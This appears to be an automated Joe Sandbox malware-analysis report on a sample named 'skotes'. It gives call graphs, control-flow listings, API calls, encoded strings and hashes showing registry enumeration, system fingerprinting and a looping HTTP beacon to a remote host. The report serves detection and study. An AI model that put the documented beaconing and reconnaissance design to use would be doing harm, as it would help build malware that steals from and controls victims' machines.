c16e77 Concurrency::details::ResourceManager::CreateAllocatedNodeData 37561->37562 37566 c16e5a __dosmaperr ___std_exception_copy 37561->37566 37563 c16eb9 CreateFileW 37562->37563 37567 c16e9d __dosmaperr ___std_exception_copy Concurrency::details::ResourceManager::CreateAllocatedNodeData 37562->37567 37564 c16edd 37563->37564 37563->37567 37568 c16fb4 GetFileType 37564->37568 37566->37560 37567->37560 37570 c16fef Concurrency::details::ResourceManager::CreateAllocatedNodeData 37568->37570 37577 c17085 __dosmaperr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37568->37577 37569 c17028 GetFileInformationByHandle 37571 c1703e 37569->37571 37569->37577 37570->37569 37570->37577 37578 c17124 37571->37578 37573 c1705b 37574 c17124 SystemTimeToTzSpecificLocalTime 37573->37574 37575 c1706e 37574->37575 37576 c17124 SystemTimeToTzSpecificLocalTime 37575->37576 37576->37577 37577->37567 37579 c1713c 37578->37579 37580 c1715c SystemTimeToTzSpecificLocalTime 37579->37580 37581 c17142 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37579->37581 37580->37581 37581->37573 37592 bfd762 37596 bfd76e ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 37592->37596 37593 bfd85c ___security_init_cookie __FrameHandler3::FrameUnwindToState ___scrt_fastfail 37594 bfd7be ___scrt_uninitialize_crt 37593->37594 37595 bfd8e9 __scrt_common_main_seh 37593->37595 37596->37593 37596->37594 37598 bf6d30 37596->37598 37606 bea960 Sleep CreateMutexA 37598->37606 37600 bf6d3b 37608 bf4fc0 37600->37608 37602 bf6d4f 37615 be6020 37602->37615 37604 bf6d54 37605 be6020 2 API calls 37604->37605 37605->37604 37607 bea98e 37606->37607 37607->37600 37610 bf5015 Concurrency::details::ResourceManager::Release 37608->37610 37611 bf6c46 Concurrency::details::_CancellationTokenState::_RegisterCallback 37610->37611 37621 be7d30 37610->37621 37612 bf50ed 37625 be8380 37612->37625 37614 bf5106 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37614->37602 37616 be603b Concurrency::details::_CancellationTokenState::_RegisterCallback __wsopen_s 37615->37616 37617 be6150 RegOpenKeyExA 37616->37617 37619 be6493 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37617->37619 37620 be61a3 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::CreateAllocatedNodeData 37617->37620 37618 be6243 RegEnumValueA 37618->37620 37619->37604 37620->37618 37620->37619 37622 be7d96 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::CreateAllocatedNodeData 37621->37622 37623 be7ed3 GetNativeSystemInfo 37622->37623 37624 be7ed7 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37622->37624 37623->37624 37624->37612 37628 be83e5 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::CreateAllocatedNodeData 37625->37628 37626 be8403 Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37626->37614 37627 be8524 GetNativeSystemInfo 37627->37626 37628->37626 37628->37627 37629 bf6d00 CreateThread 37630 bf6d20 Sleep 37629->37630 37631 bf6c70 37629->37631 37630->37630 37632 bf6ca0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37631->37632 37635 bf47b0 37632->37635 37634 bf6cec Sleep 37634->37632 37636 bf4e70 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37635->37636 37637 bf47eb Concurrency::details::_CancellationTokenState::_RegisterCallback 37635->37637 37636->37634 37637->37636 37643 bebe30 37637->37643 37639 bf4843 __dosmaperr Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 37639->37636 37640 bebe30 6 API calls 37639->37640 37641 bf4b62 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 37640->37641 37641->37636 37654 bf4390 6 API calls 3 library calls 37641->37654 37644 bebe82 37643->37644 37646 bec22e Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37643->37646 37645 bebe96 Sleep InternetOpenW InternetConnectA 37644->37645 37644->37646 37647 bebf18 Concurrency::details::_CancellationTokenState::_RegisterCallback 37645->37647 37646->37639 37648 bebf2e HttpOpenRequestA 37647->37648 37649 bebf4c Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 37648->37649 37650 bebfee HttpSendRequestA 37649->37650 37652 bec006 Concurrency::details::ResourceManager::Release 37650->37652 37651 bec08e InternetReadFile 37653 bec0b5 __InternalCxxFrameHandler 37651->37653 37652->37651 37654->37636

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1134 c22517-c2253f call c22133 call c22191 1139 c226e5-c2271a call c16c87 call c22133 call c22191 1134->1139 1140 c22545-c22551 call c22139 1134->1140 1164 c22842-c2289e call c16c87 call c262ee 1139->1164 1165 c22720-c2272c call c22139 1139->1165 1140->1139 1145 c22557-c22562 1140->1145 1147 c22564-c22566 1145->1147 1148 c22598-c225a1 call c1adf5 1145->1148 1151 c22568-c2256c 1147->1151 1159 c225a4-c225a9 1148->1159 1154 c22588-c2258a 1151->1154 1155 c2256e-c22570 1151->1155 1157 c2258d-c2258f 1154->1157 1160 c22572-c22578 1155->1160 1161 c22584-c22586 1155->1161 1162 c226e1-c226e4 1157->1162 1163 c22595 1157->1163 1159->1159 1166 c225ab-c225cc call c1b04b call c1adf5 1159->1166 1160->1154 1167 c2257a-c22582 1160->1167 1161->1157 1163->1148 1184 c228a0-c228a6 1164->1184 1185 c228a8-c228ab 1164->1185 1165->1164 1174 c22732-c2273e call c22165 1165->1174 1166->1162 1182 c225d2-c225d5 1166->1182 1167->1151 1167->1161 1174->1164 1183 c22744-c22765 call c1adf5 GetTimeZoneInformation 1174->1183 1186 c225d8-c225dd 1182->1186 1199 c22820-c22841 call c2212d call c22121 call c22127 1183->1199 1200 c2276b-c2278c 1183->1200 1187 c228ee-c22900 1184->1187 1185->1187 1188 c228ad-c228bd call c1b04b 1185->1188 1186->1186 1190 c225df-c225f1 call c1a1f1 1186->1190 1193 c22902-c22905 1187->1193 1194 c22910 1187->1194 1205 c228c7-c228e0 call c262ee 1188->1205 1206 c228bf 1188->1206 1190->1139 1203 c225f7-c2260a call c24b17 1190->1203 1193->1194 1201 c22907-c2290e call c22517 1193->1201 1197 c22915-c2292a call c1adf5 call bfcff1 1194->1197 1198 c22910 call c226f2 1194->1198 1198->1197 1207 c22796-c2279d 1200->1207 1208 c2278e-c22793 1200->1208 1201->1197 1203->1139 1228 c22610-c22613 1203->1228 1231 c228e2-c228e3 1205->1231 1232 c228e5-c228eb call c1adf5 1205->1232 1215 c228c0-c228c5 call c1adf5 1206->1215 1217 c227af-c227b1 1207->1217 1218 c2279f-c227a6 1207->1218 1208->1207 1237 c228ed 1215->1237 1219 c227b3-c227dc call c1ef17 call c1e926 1217->1219 1218->1217 1225 c227a8-c227ad 1218->1225 1246 c227ea-c227ec 1219->1246 1247 c227de-c227e1 1219->1247 1225->1219 1235 c22615-c22619 1228->1235 1236 c2261b-c22621 1228->1236 1231->1215 1232->1237 1235->1228 1235->1236 1242 c22623 1236->1242 1243 c22624-c22631 call c18bbe 1236->1243 1237->1187 1242->1243 1251 c22634-c22639 1243->1251 1250 c227ee-c2280c call c1e926 1246->1250 1247->1246 1249 c227e3-c227e8 1247->1249 1249->1250 1257 c2281b-c2281e 1250->1257 1258 c2280e-c22811 1250->1258 1253 c22642-c22643 1251->1253 1254 c2263b-c22640 1251->1254 1253->1251 1254->1253 1256 c22645-c22648 1254->1256 1259 c22696-c22699 1256->1259 1260 c2264a-c22661 call c18bbe 1256->1260 1257->1199 1258->1257 1261 c22813-c22819 1258->1261 1262 c226a0-c226b4 1259->1262 1263 c2269b-c2269d 1259->1263 1268 c22663 1260->1268 1269 c22675-c22677 1260->1269 1261->1199 1266 c226b6-c226c6 call c24b17 1262->1266 1267 c226ca 1262->1267 1263->1262 1266->1139 1276 c226c8 1266->1276 1270 c226cd-c226df call c2212d call c22121 1267->1270 1273 c22665-c2266a 1268->1273 1269->1259 1275 c22679-c22689 call c18bbe 1269->1275 1270->1162 1273->1269 1277 c2266c-c22673 1273->1277 1283 c22690-c22694 1275->1283 1276->1270 1277->1269 1277->1273 1283->1259 1284 c2268b-c2268d 1283->1284 1284->1259 1285 c2268f 1284->1285 1285->1283
                                                          APIs
                                                          • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00C36758), ref: 00C2275C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationTimeZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 565725191-239921721
                                                          • Opcode ID: d0e297c3abd2df61697afb01af7079f31fad7064d70d3f146a6de6d9dd226d89
                                                          • Instruction ID: 20ed00e8c6bb6f380797e3dd7624f11ce6ec664d74a8b71ea1c59f9b7b4e0d09
                                                          • Opcode Fuzzy Hash: d0e297c3abd2df61697afb01af7079f31fad7064d70d3f146a6de6d9dd226d89
                                                          • Instruction Fuzzy Hash: 24C13676A00265BBDB249F78EC41BEE7BB8EF46314F1440A9F890D7691E7308E41E750

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 543 bebe30-bebe7c 544 bebe82-bebe86 543->544 545 bec281-bec2a6 call bf80c0 543->545 544->545 547 bebe8c-bebe90 544->547 550 bec2a8-bec2b4 545->550 551 bec2d4-bec2ec 545->551 547->545 549 bebe96-bebf2a Sleep InternetOpenW InternetConnectA call bf7a00 call be5c10 547->549 578 bebf2e-bebf4a HttpOpenRequestA 549->578 579 bebf2c 549->579 553 bec2ca-bec2d1 call bfd663 550->553 554 bec2b6-bec2c4 550->554 555 bec238-bec250 551->555 556 bec2f2-bec2fe 551->556 553->551 554->553 558 bec34f-bec354 call c16c6a 554->558 562 bec256-bec262 555->562 563 bec323-bec33f call bfcff1 555->563 560 bec22e-bec235 call bfd663 556->560 561 bec304-bec312 556->561 560->555 561->558 568 bec314 561->568 569 bec268-bec276 562->569 570 bec319-bec320 call bfd663 562->570 568->560 569->558 577 bec27c 569->577 570->563 577->570 580 bebf4c-bebf5b 578->580 581 bebf7b-bebfea call bf7a00 call be5c10 call bf7a00 call be5c10 578->581 579->578 583 bebf5d-bebf6b 580->583 584 bebf71-bebf78 call bfd663 580->584 595 bebfee-bec004 HttpSendRequestA 581->595 596 bebfec 581->596 583->584 584->581 597 bec006-bec015 595->597 598 bec035-bec05d 595->598 596->595 599 bec02b-bec032 call bfd663 597->599 600 bec017-bec025 597->600 601 bec08e-bec0af InternetReadFile 598->601 602 bec05f-bec06e 598->602 599->598 600->599 606 bec0b5 601->606 604 bec084-bec08b call bfd663 602->604 605 bec070-bec07e 602->605 604->601 605->604 609 bec0c0-bec170 call c14250 606->609
                                                          APIs
                                                          • Sleep.KERNELBASE(000005DC,C90F3C56,?,00000000), ref: 00BEBEB8
                                                          • InternetOpenW.WININET(00C38DC8,00000000,00000000,00000000,00000000), ref: 00BEBEC7
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BEBEEC
                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 00BEBF36
                                                          • HttpSendRequestA.WININET(?,00000000), ref: 00BEBFF6
                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 00BEC0A8
                                                          • InternetCloseHandle.WININET(?), ref: 00BEC187
                                                          • InternetCloseHandle.WININET(?), ref: 00BEC18F
                                                          • InternetCloseHandle.WININET(?), ref: 00BEC197
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                          • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                          • API String ID: 2167506142-885246636
                                                          • Opcode ID: 57f01bfd4e4d5a7596a02a116bbb4b1d8f0f93bc291139b0d2b1a7366fb89500
                                                          • Instruction ID: 74576e4025605bf3624c6562f49cdf6b8681e7e27b77de761d85f9f32b7e234a
                                                          • Opcode Fuzzy Hash: 57f01bfd4e4d5a7596a02a116bbb4b1d8f0f93bc291139b0d2b1a7366fb89500
                                                          • Instruction Fuzzy Hash: 5EB105B1600258ABDB28DF29CC85BEEBBB5EF45304F5041E9F508972C2DB709AC5CB95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 698 be6020-be619d call bfe150 call bf80c0 * 5 RegOpenKeyExA 711 be61a3-be6233 call c140f0 698->711 712 be64b1-be64ba 698->712 741 be649f-be64ab 711->741 742 be6239-be623d 711->742 714 be64bc-be64c7 712->714 715 be64e7-be64f0 712->715 716 be64dd-be64e4 call bfd663 714->716 717 be64c9-be64d7 714->717 718 be651d-be6526 715->718 719 be64f2-be64fd 715->719 716->715 717->716 721 be65d7-be65df call c16c6a 717->721 725 be6528-be6533 718->725 726 be6553-be655c 718->726 723 be64ff-be650d 719->723 724 be6513-be651a call bfd663 719->724 723->721 723->724 724->718 733 be6549-be6550 call bfd663 725->733 734 be6535-be6543 725->734 728 be655e-be6569 726->728 729 be6585-be658e 726->729 736 be657b-be6582 call bfd663 728->736 737 be656b-be6579 728->737 738 be65bb-be65d6 call bfcff1 729->738 739 be6590-be659f 729->739 733->726 734->721 734->733 736->729 737->721 737->736 745 be65b1-be65b8 call bfd663 739->745 746 be65a1-be65af 739->746 741->712 748 be6499 742->748 749 be6243-be6279 RegEnumValueA 742->749 745->738 746->721 746->745 748->741 755 be627f-be629e 749->755 756 be6486-be648d 749->756 759 be62a0-be62a5 755->759 756->749 757 be6493 756->757 757->748 759->759 760 be62a7-be62fb call bf80c0 call bf7a00 * 2 call be5d50 759->760 760->756
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00BE617D
                                                          • RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00BE6271
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
